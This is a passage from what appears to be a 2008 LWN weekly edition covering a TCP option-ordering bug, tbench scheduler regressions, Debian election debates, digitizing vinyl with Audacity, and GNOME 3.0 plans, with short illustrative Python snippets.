normally been expected.  By way of comparison: 2.6.25-rc2 had 359 patches
applied since 2.6.25-rc1.  For 2.6.26-rc2, 446 changesets were merged, and,
for 2.6.27-rc2, the count was 780.  For 2.6.28-rc2, instead, a total of 22
changes went in.  Says Linus:


	And hey, maybe we can even _continue_ the nice model of "just small
	fixes after -rc1". I know, it sounds insane, but it's a real
	pleasure to do an -rc2 with just a handful of fixes for real
	problems that real people see.  What a concept!


Should this pattern hold, it may well be that 2.6.28 will stabilize more
quickly and successfully than its predecessors.  It will, in any case, be
interesting to watch.

		Networking change causes distribution headaches


A seemingly innocuous change to the networking code that went into the
2.6.27 kernel is now 
causing trouble for various distributions. Ubuntu, Fedora, and openSUSE are
all buttoning up their 
packages for a release in the near future—with Ubuntu's due this
week—so kernel changes are not 
particularly welcome.  Unfortunately, if the problem is not addressed, some
users may never be able to download a
fix because their TCP/IP won't interoperate with some broken equipment
on the internet.


The problem stems from changes that were made to clean up the TCP option
code that were merged
back in July as part of the 2.6.27 merge window.  TCP options are
a mechanism to expand the functionality of the protocol as conditions
change.  There are a handful of commonly used options that the two
endpoints of a connection can agree to use, for things like maximum segment
size (MSS), window scaling, selective acknowledgment (SACK), and
timestamps.  Options have been added over time to provide more internet
robustness and performance as well as to support higher-bandwidth
physical connections.


A perfectly
reasonable, if unintended, consequence of the code change was that the
options were put into the header in a slightly different order.
According to the relevant RFCs,
options can appear in any order in the option section of the TCP header.
But some home and/or internet routers seem to expect a fixed order,
refusing to make connections if the order is "wrong".
In particular, it would seem that the MSS option needs to appear before the
SACK option.
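
The difference between a conforming parser and an order-sensitive one can be
sketched as follows.  The option kind numbers are the standard ones; the two
orderings and the picky_middlebox_accepts() check are assumptions made for
illustration and do not reproduce the exact layout used by any kernel or the
logic of any particular router.

```python
import struct

# Standard TCP option kind numbers.
EOL, NOP, MSS, WSCALE, SACK_PERMITTED, TIMESTAMP = 0, 1, 2, 3, 4, 8


def encode(options):
    """Encode (kind, payload) pairs as option bytes, NOP-padded to 4."""
    out = bytearray()
    for kind, payload in options:
        out += bytes([kind, 2 + len(payload)]) + payload
    out += bytes([NOP]) * (-len(out) % 4)
    return bytes(out)


def parse(data):
    """Order-agnostic parser: returns {kind: payload} in arrival order."""
    found, i = {}, 0
    while i < len(data):
        kind = data[i]
        if kind == EOL:
            break
        if kind == NOP:
            i += 1
            continue
        length = data[i + 1]
        if length < 2:
            break  # malformed option; stop rather than loop forever
        found[kind] = data[i + 2:i + length]
        i += length
    return found


def picky_middlebox_accepts(data):
    """Hypothetical broken device insisting that MSS precede SACK."""
    order = list(parse(data))
    if MSS in order and SACK_PERMITTED in order:
        return order.index(MSS) < order.index(SACK_PERMITTED)
    return True


mss = (MSS, struct.pack("!H", 1460))
sack = (SACK_PERMITTED, b"")
stamp = (TIMESTAMP, struct.pack("!II", 12345, 0))
wscale = (WSCALE, bytes([7]))

old_order = encode([mss, sack, stamp, wscale])   # illustrative ordering
new_order = encode([sack, stamp, mss, wscale])   # illustrative ordering
```

Both byte strings carry exactly the same information as far as parse() is
concerned; only the order-sensitive check tells them apart.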


The bug was reported
to Ubuntu Launchpad in early September, but not a lot of progress was
made until it was added to the kernel.org
bugzilla in early October.  It seems to have only affected a relatively
small number of users—Red Hat's Dave Jones said that there were no
reports from users of the rawhide 2.6.27 kernel—as it was rather
hardware-specific.  This made it difficult to track down for the majority
of folks who couldn't reproduce it.  Ubuntu user Aldo Maggi, who filed the
kernel bug,
set a marvelous example of how to work with the kernel hackers to track
down a problem, as can be seen in the bugzilla entry.


Eventually, the option re-ordering problem was discovered and a patch was submitted by Ilpo Järvinen that
restored the order of the options.  Along the way, with help from
Mandriva, 
it was discovered that
turning off TCP timestamps by way of:

worked around the problem without changing the kernel—at the cost of
losing the TCP timestamp functionality.
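
The workaround comes down to clearing the net.ipv4.tcp_timestamps sysctl.  A
minimal sketch of doing so programmatically follows; the helper names are
hypothetical, the path is the usual /proc/sys location for that sysctl, and
writing to it requires root privileges.

```python
from pathlib import Path

# Usual procfs location of the net.ipv4.tcp_timestamps sysctl.
TCP_TIMESTAMPS = Path("/proc/sys/net/ipv4/tcp_timestamps")


def set_tcp_timestamps(enabled, path=TCP_TIMESTAMPS):
    """Write the sysctl value; needs root when aimed at the real file."""
    Path(path).write_text("1\n" if enabled else "0\n")


def tcp_timestamps_enabled(path=TCP_TIMESTAMPS):
    """Report whether timestamps are on (any value other than 0)."""
    return Path(path).read_text().strip() != "0"
```

Calling set_tcp_timestamps(False) as root would apply the workaround until
the next reboot; making it permanent requires a sysctl configuration entry.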


So it would seem that the problem has been solved—the patch has been
merged
into Linus Torvalds's tree for 2.6.28—but there are still a few
unresolved issues.  The three distributions that are preparing new releases
are all based on 2.6.27, but as yet, there has not been a -stable kernel
release that picks up the patch, though it is likely to come fairly soon.


In the meantime, Fedora has added the patch to its kernel in rawhide, so
Fedora 10 (and eventually Fedora 9 when it gets rebased on 2.6.27) will
have the fix.  openSUSE is waiting a bit to see what gets submitted by the
kernel networking developers to the
-stable team.  As Novell/SUSE kernel hacker Greg Kroah-Hartman puts it:
"We still have a while to go before the final 11.1 
kernel is released, so we feel no pressure here."  Unfortunately,
Ubuntu got caught very late in its release cycle as 8.10 (or Intrepid Ibex)
is due on October 30.


The original plan as outlined
by Debian/Ubuntu hacker Steve Langasek was to note the problem in the
release notes
for 8.10, but not address the underlying problem until after the release:

The kernel fix is known upstream; implementing it requires kernel uploads
and installer rebuilds, which it's just not possible to fit in between the
release candidate and the release. We will certainly want to include this
fix in a kernel update as soon as possible after the release, but this is
unfortunately in a class of bugs that we can't fix the week of release (even
turning timestamps off requires a kernel upload, unless we want to
permanently disable tcp timestamp support for Ubuntu 8.10).


That led many in the Launchpad bug thread to note that it was going to be
a real mess, especially for the least technical of users.  Nick Lowe sums
up the problem:

[...] You should really delay for this if you need more time...

RC shouldn't mean Release ComeHellOrHighWater

The users who are most likely to hit this are home users behind their
aged/unmaintained consumer routers who are highly unlikely to understand
why they can't access the Web and will just go elsewhere... 


Certainly, the release notes are not the first place an affected user would
go if they ran into the problem.  More than likely, they would just decide that
Ubuntu—by extension Linux—is simply broken, so it is a relief
to see
that Ubuntu eventually relented.  For 8.10, the procps package has
been changed to work around the problem by turning off timestamps.  Once a
new kernel package is released with the re-ordering patch included,
timestamps can presumably be restored.


This kind of problem—where affected users may not be able to retrieve an
update to fix it—should really be part of the definition of a
show-stopping (i.e. release date slipping) problem. It was rather galling
to some that Ubuntu
would consider shipping with this known issue, simply to make its 8.10
release in the 10th month of 2008 (which is how Ubuntu releases are numbered).


Ubuntu is justifiably proud of its record of shipping releases on time, but
it cannot do that at the expense of its users.  While the workaround that
was implemented was suboptimal, perhaps, it does ensure that
users—especially non-technical users—won't find that web
surfing doesn't work in Linux.  It should also allow Ubuntu to release on
schedule. 


[ Thanks to Nick Lowe for giving us a heads-up about this issue. ]

		Tracking tbench troubles


Kernel developers tend to have a mixed view of benchmarks.
A benchmarking tool can do an effective job of quantifying specific aspects
of system performance.  But benchmarks are not real workloads; optimizing
for a benchmark can often distort a system in ways which are detrimental to
real applications.  Since kernel hackers do not always see benchmark optimization
as their top priority, they can sometimes assign a lower priority to
benchmark regressions as well.  But, sometimes, benchmark problems indicate
a real problem in the kernel.


The tbench benchmark is meant to measure networking performance; it
consists of a collection of processes quickly making lots of small requests
from a server process.  Since the requests are small, there is not much
time spent actually moving data; it's all a matter of shifting small
packets around - and scheduling between the processes.  Back in August,
Christoph Lameter reported
that tbench performance in the mainline kernel had been declining for some
time.  His system was able to move 3208 MB/sec with a 2.6.22 kernel,
but only 2571 MB/sec with a 2.6.27-rc kernel.  Each of the releases in
between showed a decline from the one which came before, with 2.6.25
showing an especially big hit.  Others were able to reproduce the results,
and they engaged in various rounds of speculation on where the problem
might be, but it seems that, initially, nobody actually dug into the
system to see what was going on. 


At linux.conf.au 2007, Andi Kleen gave a talk describing various types of
kernel hackers.  One of those was the "Russian mathematician" who, he
suspected, was often a room full of talented developers operating under a
single name.  Evgeniy Polyakov can only have reinforced that view when, in
early October, he tracked down the biggest
offending commit through a process which, he says, involved "just [a]
couple of hundreds of compilations."  In the process, he put together a plot of tbench performance
which, he says, is suitable for scaring children.  Through a massive amount
of work, he was able to point the finger at a scheduler patch - not
something in the networking stack at all.


In particular, Evgeniy found that the patch adding high-resolution
preemption ticks was the problem.  The idea behind this patch was to make
time slices more accurate by scheduling preemption at just the right time.
It makes sense; once the regular clock tick has been eliminated, there is
no reason not to arrange for preemption to happen when the scheduling
algorithm says it should.  Unfortunately, it seems that this change also
adds sufficient overhead to slow down tbench performance considerably; when
Evgeniy backed it out, his performance went from 373 MB/sec to
455 MB/sec.  That would seem to be a pretty clear indication that
something is amiss with high-resolution preemption ticks.
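
For a sense of scale, the figures quoted above can be turned into
percentages.  The two pairs of numbers come from different systems, so only
the relative changes are meaningful; this is simple arithmetic on the
reported values, not a new measurement.

```python
def percent_change(before, after):
    """Relative change from before to after, in percent."""
    return (after - before) / before * 100.0


# Christoph Lameter's report: 2.6.22 versus a 2.6.27-rc kernel.
decline = percent_change(3208, 2571)

# Evgeniy Polyakov's system: before and after backing out the patch.
recovery = percent_change(373, 455)

print(f"decline: {decline:.1f}%  recovery: {recovery:.1f}%")
```

The overall slide works out to a bit under 20%, while reverting the
high-resolution preemption tick patch recovered roughly 22% on the second
system.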


At this point, the public discussion went quiet, though it appears that a number
of developers were working on it off-list.  David Miller eventually tracked
down the worst of the trouble to the wakeup code, something he was rather vocally unhappy about having had to
do.  Eventually a patch was merged (for 2.6.28-rc2) disabling the
high-resolution preemption tick feature.  Since that discussion was private,
it's not quite clear why this change took as long as it did.  But there are a
couple of plausible reasons.  One is that this particular feature is
disabled by default anyway, so most users will not encounter the
performance problem it creates.  

But there is also the question of weighing the benchmark result against the
effects on other, "real" workloads.  Ingo Molnar said:


	But it's a difficult call with no silver bullets. On one hand we
	have folks putting more and more stuff into the context-switching
	hotpath on the (mostly valid) point that the scheduler is a
	slowpath compared to most other things. On the other hand we've got
	folks doing high-context-switch ratio benchmarks and complaining
	about the overhead whenever something goes in that improves the
	quality of scheduling of a workload that does not context-switch as
	massively as tbench. It's a difficult balance and we cannot satisfy
	both camps.


So, by this view, performance on scheduler-intensive benchmarks must be
weighed against the wider value of other scheduler enhancements.  David
Miller has a different view of the
situation, though:


	If we now think it's ok that picking which task to run is more
	expensive than writing 64 bytes over a TCP socket and then blocking
	on a read, I'd like to stop using Linux. :-) That's "real work" and
	if the scheduler is more expensive than "real work" we lose.


In David's view, scheduler performance has been getting consistently worse
since the switch to the completely fair scheduler in 2.6.23.  He would like
to see some energy put into recovering some of the performance of the
pre-CFS scheduler; in particular, he thinks that Ingo and company should
work to fix (what he sees as) a regression that they caused.

For the time being, the worst performance regression has been "fixed" by
disabling the high-resolution preemption tick feature; Ingo says that the
feature will not come back until it can be supported without slowing
things down.  But the scheduler seems to have gotten slower in a number of
other ways as well.  Your editor will make a prediction here: now that the
issue has been called out in such clear terms, somebody will find the time
to fix these problems to the point that the CFS scheduler will be faster
than the O(1) scheduler which preceded it.

Beyond that, there are suggestions that the
scheduler cannot take the blame for all of the observed regressions in
tbench results.  So developers will have to look at the rest of the system
to figure out what's going on.  The good news is that this is a clear
challenge with an 
objective way to measure success.  Once a problem reaches that level of
clarity, it's usually just a matter of some hacking.

		Debian's election season: old firmware and new contributors


Longtime LWN readers will be aware of your editor's tendency toward the
publishing of wild predictions at the beginning of each year.  The 2007 predictions irritated some
Debian developers and users by suggesting that, after getting the Etch
release out the door, the project would go back to arguing about
firmware issues.  At the end of the year, it became necessary to
acknowledge that this prediction, like so many others, had failed to come
to pass.  In retrospect, the error in this prediction was obvious: the
Debian Project traditionally saves the firmware argument for the end of the
release process.  After all, they need to find some way to delay a
release once it's looking close to ready.

The problem with firmware, of course, is that it is a binary blob lacking
the corresponding source, and, sometimes, even a license allowing its
distribution.  Many developers and users see that blob as being part of the
hardware; as long as the blob is distributable, it does not bother them.
Others, though, regard firmware blobs as proprietary software and their
incorporation into the kernel as a GPL violation.  The Debian Project,
which promises to deliver a 100% free distribution to its users, houses
many developers from the latter camp.  These developers, who see firmware
distribution as a violation of the project's social contract, can be
counted upon to raise the issue each release cycle.

In 2004, the project responded by passing a general resolution
suspending some social contract provisions through September 1 of that
year on the
reasoning that it would be long enough to get the Sarge release done.
Putting a date on a Debian release tends to be a mistake, though; Sarge was
not finished until June, 2005.  By unspoken consensus, that date was
somehow deemed to have fallen before September 1, 2004.  In 2006, the
project voted again
on firmware.  Having learned from experience, the exception they allowed
this time lacked a date, simply saying that the presence of binary-only
firmware in the Etch release was something the project was willing to
tolerate.


The 2008 discussion started when Ben Finney
pointed out that a number of firmware-related entries in the Debian bug
tracking system had been quietly marked "lenny-ignore" - not relevant to
the upcoming Lenny release.  This action, many have subsequently argued,
runs counter to the social contract and constitution, which do not allow
the shipping of non-free software to be swept under the carpet in this way.
They would, instead, like to see the kernel team remove the (relatively
few) firmware blobs remaining in the kernel.  Such a change, it is said,
should be relatively easy; recent changes within the kernel are
helpful in this regard - though said changes became available in 2.6.27,
which is not the kernel expected to be shipped with the Lenny release.  For
the 2.6.26 kernel used by Lenny, Ben Hutchings reports that he has done the necessary work to
excise the remaining firmware.


On the other side, there are developers who are more concerned about
(1) getting the Lenny release out as quickly as possible, and
(2) making sure that hardware Just Works for Lenny users.  They would
rather that the process of removing firmware continue independently of (and
without delaying) the
Lenny release.


This is Debian that we're talking about, so the issue will probably be
decided by way of a general resolution.  There are currently two sets of
resolutions being circulated, though neither has reached a final state for
voting.  The first set addresses the Lenny
question, providing two options: either delay Lenny until the firmware
removal work is complete, or accept that - just once more, really this
time, honest - a major Debian release will include some firmware in its
kernel.  (The "ship Lenny" option is actually two options, one allowing
firmware and one allowing Debian Free Software Guidelines violations in
general).  What the project will decide once this resolution comes to a
vote is unclear - but Debian's developers have always voted to get the
release out in the past.


The second proposal addresses what happens
after the Lenny release; it says that any package which violates the Debian
Free Software Guidelines for more than 180 days will be forced into
the non-free repository.  The clear hope here is to ensure that this tiresome
discussion doesn't happen yet again in the next release cycle.  By the time
the next release is getting close to ready, any non-compliant packages will
have long since been banished to the non-free wasteland.  If it ever comes
down to moving the kernel to non-free, though, one can assume that the
discussion will resume with a vengeance.

Developers, Members, Maintainers, and Contributors

Meanwhile, a different disagreement is headed toward - you guessed it - a
general resolution.  Long-time Debian watchers have noted that another
recurring topic of debate is the acceptance of new developers.  The new
maintainer process involves long delays, tests of ideological purity, and
more.  Even when it works smoothly (which seems to generally be the case in
recent years) it requires a certain amount of patience and determination on
the part of an aspiring Debian Developer.

The difficulty of the process is a design feature; Debian developers occupy
a position of some trust, and the project wants to make sure that
applicants are serious.  Over time, though, it has become clear that this
process is costing the project the time and energy of talented contributors
who do not wish to jump through all the hoops.  In response, the project
created a "Debian maintainer" designation which allows the uploading of
packages, but withholds many of the other privileges enjoyed by full
developers.  This change appears to have been successful in enabling a
larger group of developers to contribute to Debian.

More recently, Joerg Jaspert has proposed
lowering the bar to certain types of contribution even further.  The
proposal reads:


	Debian is about developing a free operating system, but there's
	more in an operating system than just software and packages.  If we
	want translators, documentation writers, artists, free software
	advocates, et al. to get endorsed by the project and feel proud for
	it, we need some way to acknowledge that.


To that end, Joerg would create a new "Debian Contributor" classification.
Contributors would be those doing translations or documentation; the
proposal doesn't say that contributors don't touch code, but one gets that
sense.  Contributors would still have to jump through some hoops, but they
would be fewer.  They would not be able to upload packages on their own.
The proposal also changes the Debian Maintainer standards, making that
designation a little bit harder to get.  Finally, the proposal states that 
all new applicants to the project would become Contributors or
Maintainers.  Only after a six-month period would they be able to apply for
full Debian Developer or Debian Member status -- "Debian Member" being
another new category that, while being equivalent to Debian Developer in
almost all respects, would not have package upload privileges.

Interestingly, there has not been much discussion of the substance of this
proposal.  But there has been a fair amount of debate over how it is being
done.  It would appear that some developers see this change as being
imposed by a single project official without the debate that Debian changes
normally require.  Martin Krafft has further asserted that this kind of change goes beyond
Joerg's authority as Debian account manager, a claim that Joerg
denies. 

So now there are proposed general resolutions being circulated.  An early version simply decreed that the
proposed changes were "suspended" in favor of changes to be made through a
more consensus-oriented process.  Later
versions soften the language somewhat, and thank Joerg for his effort
in this area - but still require a "consensus or general resolution" before
changes are adopted.  In any form, the clear point of the resolution is to
slow down the process and open it up for a wider discussion.


Again, voting has not begun on any specific resolution, so we don't yet
know what will even be voted on, much less how it will come out.  But we
can expect that, as a certain presidential election process finally
(thankfully) comes to a close, activity will be picking up on a different
set of votes.

		Digitizing Vinyl Records with Audacity


The Audacity
sound editor is an excellent application with many uses.
Your author recently started working on a long-term project to
convert the better parts of his ancient vinyl phonograph record
collection to FLAC
files so that they could be added to his digital audio library.
Audacity was chosen to do the audio recording and processing work.


Prior to undertaking such a project, one must first assemble
the appropriate equipment.
An older desktop computer with an Athlon 2500 processor and
500MB of RAM was used for the computing platform.
Besides a sufficiently powerful CPU, the second most important
piece of hardware is a decent sound card.  An
M-AUDIO Delta 44 was chosen.
Standard sound cards should also work, but the Delta 44 has
higher quality A-D converters that are mounted external to the
computer for lower noise.
The Ubuntu Studio distribution
was used on the machine, although any current Linux distribution should work.


The turntable is an ancient Technics SL-D3 and a Pioneer SX-780 receiver
is used as the phono preamp.  One of the Tape Record Outputs
from the Pioneer receiver is fed into the Delta 44 sound card with
an appropriate set of adapter cables.  The turntable's tracking
weight, anti-skid settings and platter speed should all be adjusted
appropriately.
One of the new USB turntables could probably be used here if you don't
already have access to the legacy hardware.


The Audacity sound editor needs to be set up by entering the
Edit->Preferences
menu; the audio quality was set to 44,100 Hz sampling at 16 bits
(standard CD quality).  Depending on your needs, other sample rates
can be used.  One of the more important configuration steps
involves making sure the Software Playthrough button in the
Audio I/O
preference window is deselected.  On this particular machine, enabling
Software Playthrough
results in audible sample loss on the recording.
Audio monitoring is done through the Pioneer receiver.
The audio meter should be enabled on the main
Audacity window and the GNOME ALSA sound mixer is used to set the
sound card input levels.  The machine is now ready to record.
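
The disk space consumed by these settings is easy to estimate.  The sketch below assumes a stereo (two-channel) recording and a 20-minute album side; neither figure comes from the setup described above, and the function name is made up for illustration.

```python
def pcm_bytes(seconds: float, sample_rate: int = 44_100,
              bits_per_sample: int = 16, channels: int = 2) -> int:
    """Size of uncompressed PCM audio in bytes (file header overhead ignored)."""
    bytes_per_frame = (bits_per_sample // 8) * channels
    return int(seconds * sample_rate * bytes_per_frame)


# A hypothetical 20-minute album side recorded in stereo.
side_bytes = pcm_bytes(20 * 60)
print(f"{side_bytes / 1_000_000:.1f} MB")
```

Under those assumptions, each album side needs a bit over 200MB of scratch space before any conversion to a compressed format.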


It is a good idea to make a few test recordings on various album
tracks to set the sound card's input level adjustment.
A loud track should be played and the input level should be adjusted
to achieve fairly high readings on the meter without any clipping.
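
The meter reading can be cross-checked after the fact by exporting a test recording as a 16-bit WAV file and looking for the largest sample.  The following is a minimal sketch using only the Python standard library; the function names and the 0.999 threshold are assumptions, and a peak at full scale only suggests clipping rather than proving it.

```python
import array
import sys
import wave


def peak_fraction(path: str) -> float:
    """Return the largest absolute sample as a fraction of 16-bit full scale."""
    with wave.open(path, "rb") as wav:
        if wav.getsampwidth() != 2:
            raise ValueError("this sketch only handles 16-bit samples")
        frames = wav.readframes(wav.getnframes())
    samples = array.array("h", frames)
    if sys.byteorder == "big":
        samples.byteswap()  # WAV sample data is little-endian
    if not samples:
        return 0.0
    peak = max(abs(s) for s in samples)
    return peak / 32768.0


def looks_clipped(path: str, threshold: float = 0.999) -> bool:
    """Heuristic: a peak at (or right next to) full scale suggests clipping."""
    return peak_fraction(path) >= threshold
```

A loud track which peaks comfortably below 1.0 leaves some headroom; if looks_clipped() returns true, the input level should be turned down and the test repeated.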


Unless you only need to extract one track, it is best to record an
entire album side in one pass.  Recording should be enabled prior to
setting the needle on the record, and disabled after the needle
has been lifted.  Be sure to use an appropriate record cleaner
on the disc to get rid of any dust particles.


When an album side has been successfully recorded and the levels look
reasonable, it is time to do some trimming.
Listen to the beginning of the recording with the volume up a bit.
At some point the sound will probably begin with a fade in.
Select the audio
from the beginning of the recording, past the initial pop from the
needle landing in the groove, and ending a few seconds before the
first track starts.
Delete the selection with Edit->Delete.
Next, select from the new beginning to where the sound begins.
Use Effect->Fade In to make a smooth
transition from quiet to the beginning of the audio.
Perform a similar edit at the end of the album side.
Delete everything from a few seconds beyond the last sound to the end
of the recording and put a Fade Out at the end of the side.
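
For readers curious about what a fade does to the samples, here is a minimal sketch of a linear fade.  It assumes a simple straight-line gain ramp over the selection; Audacity's own implementation may differ in detail, and the function names are made up for illustration.

```python
def fade_in(samples: list[float]) -> list[float]:
    """Scale samples by a gain that starts at 0 and rises linearly toward 1."""
    n = len(samples)
    return [s * (i / n) for i, s in enumerate(samples)]


def fade_out(samples: list[float]) -> list[float]:
    """Scale samples by a gain that falls linearly and reaches 0 at the end."""
    n = len(samples)
    return [s * (1 - (i + 1) / n) for i, s in enumerate(samples)]
```

Applied to the few seconds of groove noise before the first track, a ramp like this removes the abrupt jump from digital silence to surface noise.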


If your album has a few clicks and pops, now is the time to remove
them.  Select the entire recording with Edit->Select->All
and de-click with Effect->Click Removal.  The default click
filter settings seem to work fairly well.


The next step involves putting labels at the beginning of each song,
assuming the album's material is not one long track.  First, create
a label track with Tracks->Add New->Label Track.
Hit the << rewind button and type Control-B; this puts a label
at the beginning of the recording.  Move through the album side and
put more labels at the middle of each song transition.  It is a good
idea to zoom in and put the label on a wave zero-crossing point to prevent
clicks at the beginnings of individual tracks.
If you zoom in, you can often see a change in wave patterns that is left
over from the master tape splice.
The recording should now look something like the first frame of the
Audacity Images.
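
The zero-crossing advice can be sketched in code.  The function below is a hypothetical helper, not part of Audacity: given a list of samples and a rough position, it returns the nearest index where the waveform touches or crosses zero.

```python
def nearest_zero_crossing(samples: list[int], start: int) -> int:
    """Index nearest to `start` where the waveform touches or crosses zero.

    A crossing is reported at index i when sample i is zero or when
    samples i and i+1 have opposite signs.  Returns `start` unchanged
    if the signal never crosses zero.
    """
    def crosses(i: int) -> bool:
        if samples[i] == 0:
            return True
        return i + 1 < len(samples) and (samples[i] < 0) != (samples[i + 1] < 0)

    # Search outward from the starting point, one sample at a time.
    for distance in range(len(samples)):
        for i in (start - distance, start + distance):
            if 0 <= i < len(samples) and crosses(i):
                return i
    return start
```

Splitting a track at such a point means that the new file begins near zero amplitude rather than with a sudden step, which is what would otherwise be heard as a click.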


It is a good idea to listen carefully to the entire recorded album side.
If the recording has any obnoxiously loud clicks and pops that weren't
removed with the Click Removal step, Audacity can smooth them out.
To smooth out a click, locate the offending waveform
by playing and pausing, then zoom in multiple times until the click is
visible.  Select a small region around the click and use Effect->Repair to smooth out the waveform.
Zoom out and play the area where the click removal was performed to
verify the operation.  Audacity is very forgiving; if you don't like the results of
the click removal or make another type of mistake,
Edit->Undo will reverse most operations.
An example Repair operation is shown in the
Audacity Images.


At this point, it is time to split the album side into individual
audio files.  Select File->Export Multiple, choose the
desired export format such as WAV, select
Split files: based on labels
and Name files: Numbering consecutively.
Click the Export button and Audacity will render
the individual track files.
Audacity can create .mp3 and .flac files at this point, or that can
be done at a later time.
At this point, you can exit Audacity and save any edit information if
you think you will need to work on the recording later.


The same operations are performed on the B-side of the record.
Your author likes to use a short BASH script to rename the
Audacity-generated file names to his own name scheme.
The track files are all grouped together in one directory
and converted to FLAC format with the command flac *.wav.
A meta-data text file is created with digitizing notes,
track titles and any other information that you wish to save.
Lastly, all of the files are played one more time to verify that
there are no problems.  The original album side tracks can now
be safely deleted to reclaim some disk space.
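
The renaming script itself is not shown here, so the following is only a sketch of what such a step might look like, written in Python rather than BASH.  The "NN - Title.wav" naming scheme, the function names, and the assumption that the exported files sort in track order are all illustrative; the conversion step simply runs the flac program on the renamed files.

```python
import subprocess
from pathlib import Path


def rename_tracks(directory: Path, titles: list[str]) -> list[Path]:
    """Rename the WAV files in `directory`, in sorted order, to 'NN - Title.wav'."""
    wavs = sorted(directory.glob("*.wav"))
    if len(wavs) != len(titles):
        raise ValueError(f"{len(wavs)} files but {len(titles)} titles")
    renamed = []
    for number, (old, title) in enumerate(zip(wavs, titles), start=1):
        new = old.with_name(f"{number:02d} - {title}.wav")
        old.rename(new)
        renamed.append(new)
    return renamed


def flac_command(files: list[Path]) -> list[str]:
    """Build the equivalent of `flac *.wav` without relying on shell globbing."""
    return ["flac", *map(str, files)]


def convert_to_flac(files: list[Path]) -> None:
    """Run the flac encoder; requires the flac program to be installed."""
    subprocess.run(flac_command(files), check=True)
```

Keeping the track titles in a list also gives a natural starting point for the meta-data text file.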


With enough editing effort, it is possible to make a digital copy
of a vinyl record that sounds better than the original.
Performing all of the above steps on a large collection of albums
is a big undertaking, but the reward comes in turning a hard to play
discrete music library into an easy to play digital library.


For further information on this topic, see the
followup article.


		Directions for GNOME 3.0


Earlier this year at the Gnome Users and Developers Conference, it was
announced that there would be a Gnome 3.0 and discussions about how to
make the transition are now open. Since then, there has been another
gathering
of Gnome developers, discussing and making plans about how they would
like to modernize the interface. Over the past few days, a number of
blog posts have appeared on Planet Gnome discussing some of the
happenings at this five day event, and I felt a summary of the ideas
so far might be useful to everyone concerned.

The Journal


The idea that has perhaps received the clearest exposition, along with some
concrete work on beginning to make it a reality, is a refreshed way to
handle day to day file management based on the OLPC's journal
concept.  Federico Mena-Quintero posted
to his blog reporting his team's brainstorming session. What's wrong
with how we handle file management today?  Federico says:


    Let's consider a very common workflow: download an image from a
web site, make some modifications to it, and attach it to an e-mail.
When you do "save image as" in your web browser, it will default to
~/Downloads or even ~/Desktop. When you do "file/open" in the GIMP, it
will default to the last directory you used in the GIMP, even if it
was from days ago (on my machine right now, the GIMP defaulted to look
at files from ~/src/some-random-directory) ... The end result is that
your workflow gets shattered to pieces, as programs try to be helpful
within themselves, but they totally fail at being helpful within your
workflow.


    So, programs contribute to having files scattered around
everywhere, and there is no easy way to look at everything together.


To solve this problem, they began from the premise that humans are
fairly good at knowing when they did things: "I started typing my
homework last Monday, because I knew it was due on my Thursday class"
and "I mailed you that photo two weeks ago, right after my birthday
party" were the examples given. From here, the argument is that if we
can present users with a journal view of what they did, they can
forget about where they put a file and just browse through a time line
to find what they were looking for.

The journal would not only keep track of files you created, but
websites you visited, IM conversations you had, and even allow you to
make notes about particular entries. An example of this final kind of
functionality might be noting down reference numbers from receipts or
customer service representatives. The other two major features of the
journal would be the ability to star important items, so they're kept
in a separate section, along with the ability to create files from
directly within the journal, allowing it to act as a kind of scrap
book.
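
To make the concept a little more concrete, here is one way the data behind such a journal might be modeled. This is purely a sketch: the class, its fields, and the function names are hypothetical and are not taken from Federico's proof of concept.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass
class JournalEntry:
    when: datetime          # when the user did something
    kind: str               # e.g. "file", "website", "im", "note"
    title: str
    note: str = ""          # free-form annotation, e.g. a reference number
    starred: bool = False   # starred items are also shown separately


def timeline(entries: list[JournalEntry]) -> list[JournalEntry]:
    """All entries, most recent first, for browsing by time."""
    return sorted(entries, key=lambda e: e.when, reverse=True)


def starred(entries: list[JournalEntry]) -> list[JournalEntry]:
    """Only the entries the user marked as important, most recent first."""
    return [e for e in timeline(entries) if e.starred]
```

The point of the model is that nothing in it records where a file lives; the user finds things by when they happened and by what they chose to mark.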

As well as Federico's own proof of concept implementation,
you can also find similar ideas in Mayanna's timeline,
a fork of Gimmie, and the Nemo file
manager.

Task Orientation

This post didn't arise out of the User Experience Hackfest, but from
GUADEC earlier in the year. Karl Lattimer has
posited that the application centric workflow is broken, and that
people don't use a computer with the intention of using a particular
application, but with the intention of completing a particular task.
Obviously tasks rarely stand on their own, but often form part of a
larger project.

Karl comments that he believes Federico is making moves in the right
direction with the journal, providing users with the capacity to track
what they did and when - perhaps a kind of project management
framework - but he believes that we also need to provide users with
the ability to track why things were done, gathering metadata about
the tasks and building a picture of the relationships between them.
The example he uses is that of an email received from a colleague
asking us to update a file by a certain deadline: from this we could
extract the file, the deadline, who sent it to us, and possibly even
what needs doing to the file, all of which could be fed into the
journal or other interface. This obviously has some practical
challenges when it comes to considering how it could be implemented,
but if realized could deliver an automated task list that's closely
linked with templates for commonly performed tasks, doing away with
the idea of static workspaces and applications for ever.

Karl sums up his thoughts nicely in this paragraph:


    For us to get there we need to invent some cool stuff, semantics
is one part, organising the data by what it is rather than where it
is, especially when the user has a tendency to loose things in the
jungle of file systems. Journals and revision control are another part
of it, remembering what we've been doing and when, but also templates
and schema's are part of it too, hiding the notion of an application
behind the tasks you want to achieve and the things you want to get
done.


The Desktop Shell

During this hackfest session, the team tried to forget about the
current Gnome interface and focus on what makes sense for users;
ironically, Vincent
Untz decided to start his
post, about how the team forgot about 
the current Gnome interface, with some observations of the current
Gnome interface. The problems he identified in the current interface
were four-fold. Firstly, finding the window you want can be difficult
when using the default applet, particularly if you have more than a
few windows open, and particularly if you have a smaller screen.
Secondly, few people make use of the multiple workspaces idea, largely
because they are simply unaware of their existence. Thirdly,
application menus are a slow and inefficient way to open up new
applications; some take advantage of launchers or the run dialog to
improve on this, but most don't know how to do this. And finally, the
current panel is certainly very powerful, but its power is wasted in
unneeded flexibility such as being able to position the panel in the
middle of the screen.

Perhaps the most controversial proposal to fix these problems so far
is to restrict Gnome to a single static panel: by removing one panel
we'd be saving valuable screen real estate, and by having a layout we
can depend on we'd be able to use "hot corners" more effectively,
allowing users to easily set their presence, as well as to launch a
new "activities overlay mode". While the idea of a single panel hasn't
raised too much concern, the static point has: Mathias
Hasselmann responds with "Static Panel Nonsense", suggesting that
many Gnome users, himself included, as well as Mac OS and Windows
users, heavily customize the layout of their panels with custom
launchers, and to improve something by removing existing functionality
is not a good approach.

The most promising proposal from my point of view, and what seems to
be a common OLPC inspired train of thought amongst Gnome's community,
